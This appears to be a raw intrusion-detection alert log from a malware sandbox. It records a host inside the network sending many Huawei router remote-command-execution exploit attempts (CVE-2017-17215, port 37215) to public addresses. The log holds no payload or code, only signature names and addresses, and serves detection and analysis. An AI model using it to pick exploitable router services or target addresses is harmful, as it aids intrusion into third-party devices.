                                                        06/13/24-21:32:58.823394TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4123037215192.168.2.14156.159.69.96
                                                        06/13/24-21:33:17.310330TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930037215192.168.2.14156.239.187.100
                                                        06/13/24-21:32:05.376951TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4148237215192.168.2.14197.196.75.127
                                                        06/13/24-21:32:30.078725TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734037215192.168.2.14197.16.186.173
                                                        06/13/24-21:32:07.418239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5914437215192.168.2.1441.85.88.37
                                                        06/13/24-21:31:57.093422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3758837215192.168.2.1441.180.31.80
                                                        06/13/24-21:32:21.785369TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4419637215192.168.2.14156.158.116.152
                                                        06/13/24-21:33:04.989369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4889637215192.168.2.14156.225.52.81
                                                        06/13/24-21:32:05.346374TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5207237215192.168.2.1441.192.17.185
                                                        06/13/24-21:32:11.506616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650037215192.168.2.14197.202.193.236
                                                        06/13/24-21:31:59.174684TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5684637215192.168.2.14156.228.20.155
                                                        06/13/24-21:32:40.376157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5936837215192.168.2.1441.106.86.212
                                                        06/13/24-21:32:01.220444TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4425437215192.168.2.1441.51.209.51
                                                        06/13/24-21:33:17.308710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853437215192.168.2.14197.100.114.218
                                                        06/13/24-21:32:56.756523TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616237215192.168.2.14156.116.65.222
                                                        06/13/24-21:33:15.255554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5128437215192.168.2.14156.230.214.231
                                                        06/13/24-21:32:42.422589TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821837215192.168.2.1441.102.92.137
                                                        06/13/24-21:32:19.752274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4904437215192.168.2.14197.101.42.43
                                                        06/13/24-21:32:36.267470TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3930837215192.168.2.14156.80.177.22
                                                        06/13/24-21:32:36.263073TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5014037215192.168.2.14156.185.190.172
                                                        06/13/24-21:33:17.306730TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3997237215192.168.2.14197.16.0.121
                                                        06/13/24-21:32:28.044785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295037215192.168.2.14197.121.2.93
                                                        06/13/24-21:32:54.709940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4413437215192.168.2.14156.117.98.32
                                                        06/13/24-21:33:00.866574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3476237215192.168.2.1441.17.155.46
                                                        06/13/24-21:32:19.726651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5475037215192.168.2.14156.113.40.149
                                                        06/13/24-21:32:30.079073TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5241037215192.168.2.14197.243.218.61
                                                        06/13/24-21:32:03.306220TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348437215192.168.2.1441.101.93.122
                                                        06/13/24-21:32:09.437527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803637215192.168.2.14156.90.30.230
                                                        06/13/24-21:32:30.077388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4116837215192.168.2.1441.110.56.234
                                                        06/13/24-21:32:07.402184TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4639037215192.168.2.1441.196.220.216
                                                        06/13/24-21:32:05.369998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5305037215192.168.2.14156.36.24.244
                                                        06/13/24-21:32:40.375312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5077237215192.168.2.1441.122.152.219
                                                        06/13/24-21:32:44.456603TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3992437215192.168.2.14197.93.190.255
                                                        06/13/24-21:33:13.213554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3459837215192.168.2.1441.173.37.18
                                                        06/13/24-21:32:30.078101TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093437215192.168.2.14197.50.212.222
                                                        06/13/24-21:32:32.167595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534437215192.168.2.14156.246.254.33
                                                        06/13/24-21:33:00.884860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825037215192.168.2.1441.225.84.32
                                                        06/13/24-21:32:21.782258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946837215192.168.2.14156.58.14.186
                                                        06/13/24-21:32:48.551530TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5379837215192.168.2.14156.216.40.4
                                                        06/13/24-21:32:40.376403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5115037215192.168.2.14197.55.141.98
                                                        06/13/24-21:32:54.708780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4257037215192.168.2.14156.176.5.171
                                                        06/13/24-21:33:02.952189TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5052637215192.168.2.1441.205.204.249
                                                        06/13/24-21:32:50.610904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4297637215192.168.2.14156.83.136.91
                                                        06/13/24-21:32:32.169931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4379637215192.168.2.14197.216.141.151
                                                        06/13/24-21:32:30.128867TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4338237215192.168.2.14156.20.27.156
                                                        06/13/24-21:33:09.089657TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492437215192.168.2.14197.71.186.18
                                                        06/13/24-21:32:58.843923TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512237215192.168.2.1441.160.214.143
                                                        06/13/24-21:32:07.415442TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4691637215192.168.2.14156.66.40.62
                                                        06/13/24-21:33:02.952296TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739237215192.168.2.14197.234.160.138
                                                        06/13/24-21:31:59.195740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3618037215192.168.2.14197.163.130.107
                                                        06/13/24-21:32:23.834722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098637215192.168.2.1441.197.203.138
                                                        06/13/24-21:32:25.972454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3461837215192.168.2.14197.254.195.208
                                                        06/13/24-21:32:48.572079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5797037215192.168.2.14156.93.248.12
                                                        06/13/24-21:32:30.094100TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673037215192.168.2.1441.156.5.238
                                                        06/13/24-21:32:25.973047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4488637215192.168.2.14156.1.161.165
                                                        06/13/24-21:32:25.992741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4820037215192.168.2.14197.99.50.34
                                                        06/13/24-21:32:07.403278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965837215192.168.2.14156.225.15.183
                                                        06/13/24-21:32:56.756597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5863437215192.168.2.14197.126.50.219
                                                        06/13/24-21:33:09.130037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4848637215192.168.2.1441.69.163.107
                                                        06/13/24-21:32:15.638319TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3467437215192.168.2.14197.197.173.222
                                                        06/13/24-21:32:05.350192TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947037215192.168.2.1441.112.229.49
                                                        06/13/24-21:32:19.727701TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4028837215192.168.2.14156.224.98.2
                                                        06/13/24-21:32:19.725585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260437215192.168.2.14197.5.163.119
                                                        06/13/24-21:31:59.174290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644637215192.168.2.1441.53.218.229
                                                        06/13/24-21:32:11.488658TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3416837215192.168.2.1441.66.61.196
                                                        06/13/24-21:32:46.525798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4837437215192.168.2.1441.31.147.71
                                                        06/13/24-21:32:19.731657TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4253437215192.168.2.1441.237.100.143
                                                        06/13/24-21:32:44.474618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3939637215192.168.2.1441.170.153.7
                                                        06/13/24-21:32:42.418022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4825637215192.168.2.14197.86.29.231
                                                        06/13/24-21:31:57.131126TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4266437215192.168.2.14156.247.199.134
                                                        06/13/24-21:32:25.991397TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5068637215192.168.2.14197.159.78.248
                                                        06/13/24-21:32:09.456538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3603837215192.168.2.14156.0.244.44
                                                        06/13/24-21:32:54.725067TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3706837215192.168.2.14156.82.121.102
                                                        06/13/24-21:33:09.106266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681837215192.168.2.1441.12.195.219
                                                        06/13/24-21:32:46.509727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5079437215192.168.2.14156.116.227.176
                                                        06/13/24-21:32:40.374726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3889037215192.168.2.14197.212.92.225
                                                        06/13/24-21:32:09.438524TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4861037215192.168.2.14197.27.55.26
                                                        06/13/24-21:32:09.439108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3863237215192.168.2.14156.19.118.202
                                                        06/13/24-21:31:57.090072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899637215192.168.2.14156.168.223.119
                                                        06/13/24-21:32:21.802577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458037215192.168.2.1441.229.57.68
                                                        06/13/24-21:31:57.132872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572837215192.168.2.14156.206.99.218
                                                        06/13/24-21:32:21.784265TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3990037215192.168.2.14156.244.114.131
                                                        06/13/24-21:32:09.437902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3781037215192.168.2.14156.255.208.240
                                                        06/13/24-21:33:04.993880TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3341237215192.168.2.14156.240.30.13
                                                        06/13/24-21:32:52.658332TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4897837215192.168.2.14197.200.33.72
                                                        06/13/24-21:32:56.783683TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3865237215192.168.2.14197.252.76.222
                                                        06/13/24-21:32:40.354155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4519837215192.168.2.14197.26.208.101
                                                        06/13/24-21:32:58.841937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762237215192.168.2.14197.59.47.169
                                                        06/13/24-21:33:09.130183TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5986637215192.168.2.14197.242.136.52
                                                        06/13/24-21:32:09.456330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5192037215192.168.2.14197.206.69.22
                                                        06/13/24-21:33:09.108860TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4542637215192.168.2.1441.231.230.119
                                                        06/13/24-21:32:03.300386TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039037215192.168.2.14197.31.171.82
                                                        06/13/24-21:32:11.488836TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173037215192.168.2.14197.240.243.133
                                                        06/13/24-21:33:09.088008TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4333237215192.168.2.1441.92.80.183
                                                        06/13/24-21:33:02.911410TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5941637215192.168.2.14197.247.164.251
                                                        06/13/24-21:32:42.404098TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3725837215192.168.2.14156.32.79.137
                                                        06/13/24-21:31:59.196012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3611837215192.168.2.14197.212.142.4
                                                        06/13/24-21:32:30.073682TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200237215192.168.2.14197.20.27.106
                                                        06/13/24-21:33:15.271952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4388437215192.168.2.14156.141.116.24
                                                        06/13/24-21:32:17.672105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516037215192.168.2.14156.128.141.210
                                                        06/13/24-21:32:25.993405TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626237215192.168.2.14197.243.166.39
                                                        06/13/24-21:32:42.421653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771837215192.168.2.14156.85.144.197
                                                        06/13/24-21:32:38.321025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4587637215192.168.2.1441.27.144.110
                                                        06/13/24-21:32:38.298483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818037215192.168.2.14197.222.15.228
                                                        06/13/24-21:32:17.694210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090037215192.168.2.1441.93.55.131
                                                        06/13/24-21:32:42.421767TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625237215192.168.2.1441.49.136.178
                                                        06/13/24-21:33:04.989006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5341837215192.168.2.14156.245.101.63
                                                        06/13/24-21:32:11.505597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349637215192.168.2.1441.118.104.218
                                                        06/13/24-21:32:13.569742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3329037215192.168.2.1441.124.170.201
                                                        06/13/24-21:32:05.378169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3886237215192.168.2.14197.129.215.160
                                                        06/13/24-21:32:21.783374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304637215192.168.2.1441.84.246.141
                                                        06/13/24-21:31:57.136115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4892037215192.168.2.14156.144.135.207
                                                        06/13/24-21:32:17.675757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3392237215192.168.2.1441.211.138.243
                                                        06/13/24-21:32:23.834815TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6006237215192.168.2.1441.21.240.191
                                                        06/13/24-21:32:54.725972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5787437215192.168.2.14156.135.45.64
                                                        06/13/24-21:32:17.670360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5127237215192.168.2.1441.66.162.157
                                                        06/13/24-21:33:00.885686TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5595437215192.168.2.14156.194.131.166
                                                        06/13/24-21:32:44.454105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3571637215192.168.2.14197.240.148.95
                                                        06/13/24-21:32:58.843688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734237215192.168.2.14197.74.63.182
                                                        06/13/24-21:33:09.129259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5411637215192.168.2.14156.217.105.200
                                                        06/13/24-21:32:32.155114TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4013437215192.168.2.14156.244.29.136
                                                        06/13/24-21:32:48.568652TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4301637215192.168.2.14197.189.38.34
                                                        06/13/24-21:32:46.510137TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3542237215192.168.2.1441.67.76.114
                                                        06/13/24-21:33:15.256077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4934837215192.168.2.1441.189.122.133
                                                        06/13/24-21:32:07.415868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3487037215192.168.2.14156.231.241.129
                                                        06/13/24-21:32:15.631014TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878037215192.168.2.14197.72.174.246
                                                        06/13/24-21:33:00.868922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4757837215192.168.2.1441.236.42.125
                                                        06/13/24-21:32:01.237538TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5005637215192.168.2.14197.14.145.195
                                                        06/13/24-21:32:32.168126TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5495837215192.168.2.1441.152.109.188
                                                        06/13/24-21:32:13.546764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4095037215192.168.2.14197.167.134.65
                                                        06/13/24-21:33:15.257206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4650237215192.168.2.14156.182.75.170
                                                        06/13/24-21:32:38.303832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872237215192.168.2.14156.172.47.91
                                                        06/13/24-21:32:30.076225TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6091237215192.168.2.1441.76.219.71
                                                        06/13/24-21:32:34.214480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422437215192.168.2.14197.140.18.238
                                                        06/13/24-21:32:46.502821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4989837215192.168.2.1441.18.216.150
                                                        06/13/24-21:32:01.222763TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5647237215192.168.2.14156.255.131.213
                                                        06/13/24-21:33:15.255789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4414837215192.168.2.1441.75.18.17
                                                        06/13/24-21:33:15.273662TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5019037215192.168.2.14197.126.87.234
                                                        06/13/24-21:32:48.566928TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935437215192.168.2.14156.71.218.55
                                                        06/13/24-21:33:07.041800TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3413637215192.168.2.14197.199.112.188
                                                        06/13/24-21:33:13.227428TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5239637215192.168.2.14197.189.186.7
                                                        06/13/24-21:33:04.993371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5636637215192.168.2.14156.138.116.232
                                                        06/13/24-21:32:28.024474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5439837215192.168.2.14197.148.42.51
                                                        06/13/24-21:32:34.192616TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3345237215192.168.2.1441.238.9.37
                                                        06/13/24-21:32:34.213105TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4560237215192.168.2.14197.179.174.200
                                                        06/13/24-21:32:50.611650TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6098437215192.168.2.14156.255.20.87
                                                        06/13/24-21:32:01.221170TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4648237215192.168.2.14197.86.184.4
                                                        06/13/24-21:32:30.096446TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5142437215192.168.2.1441.69.94.72
                                                        06/13/24-21:32:36.248669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439437215192.168.2.14197.220.176.227
                                                        06/13/24-21:33:09.127706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5047037215192.168.2.14156.58.211.251
                                                        06/13/24-21:32:36.246211TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068837215192.168.2.14197.33.150.32
                                                        06/13/24-21:32:25.991902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3795837215192.168.2.1441.76.155.20
                                                        06/13/24-21:32:01.221728TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5986637215192.168.2.14156.202.232.222
                                                        06/13/24-21:31:59.197330TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6036637215192.168.2.14156.58.220.239
                                                        06/13/24-21:32:01.240389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4704437215192.168.2.14156.190.3.255
                                                        06/13/24-21:32:38.320061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5695437215192.168.2.14156.182.61.101
                                                        06/13/24-21:32:15.634245TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899237215192.168.2.14156.2.63.43
                                                        06/13/24-21:33:02.937115TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5945037215192.168.2.1441.58.168.171
                                                        06/13/24-21:32:05.349314TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5591237215192.168.2.14197.18.93.132
                                                        06/13/24-21:32:56.757002TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3919837215192.168.2.1441.211.235.94
                                                        06/13/24-21:32:46.525502TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5088837215192.168.2.1441.78.233.45
                                                        06/13/24-21:32:54.707013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238837215192.168.2.1441.214.67.28
                                                        06/13/24-21:33:00.888974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4786237215192.168.2.14197.9.80.166
                                                        06/13/24-21:33:09.087009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5516237215192.168.2.1441.145.125.229
                                                        06/13/24-21:32:32.169807TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6090837215192.168.2.14156.38.76.247
                                                        06/13/24-21:33:00.871109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3909637215192.168.2.1441.220.155.153
                                                        06/13/24-21:33:05.016383TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3457637215192.168.2.1441.67.209.131
                                                        06/13/24-21:32:48.553136TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3978637215192.168.2.14156.72.67.189
                                                        06/13/24-21:32:07.402510TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5660437215192.168.2.1441.169.160.177
                                                        06/13/24-21:33:11.157622TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5878637215192.168.2.1441.250.133.217
                                                        06/13/24-21:31:57.153986TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5282037215192.168.2.14156.18.127.190
                                                        06/13/24-21:32:03.309609TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3385637215192.168.2.14156.133.193.16
                                                        06/13/24-21:32:13.568100TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6076037215192.168.2.14197.66.127.9
                                                        06/13/24-21:31:59.175155TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4022237215192.168.2.14156.46.236.126
                                                        06/13/24-21:32:50.610658TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4177437215192.168.2.14197.45.207.48
                                                        06/13/24-21:33:11.157714TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054637215192.168.2.14156.192.219.220
                                                        06/13/24-21:32:36.246254TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3534237215192.168.2.1441.69.214.31
                                                        06/13/24-21:32:40.375235TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6038437215192.168.2.14197.180.233.62
                                                        06/13/24-21:32:34.195257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5319837215192.168.2.14197.13.177.214
                                                        06/13/24-21:32:09.458971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6070237215192.168.2.14156.203.221.47
                                                        06/13/24-21:32:15.633505TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4477437215192.168.2.14156.222.57.234
                                                        06/13/24-21:32:32.169994TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5141437215192.168.2.14156.30.147.91
                                                        06/13/24-21:32:42.420755TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3782637215192.168.2.14156.189.103.246
                                                        06/13/24-21:32:03.279674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3680237215192.168.2.14156.104.85.254
                                                        06/13/24-21:32:07.417372TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993437215192.168.2.1441.191.29.205
                                                        06/13/24-21:32:25.976222TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5152037215192.168.2.14156.5.101.40
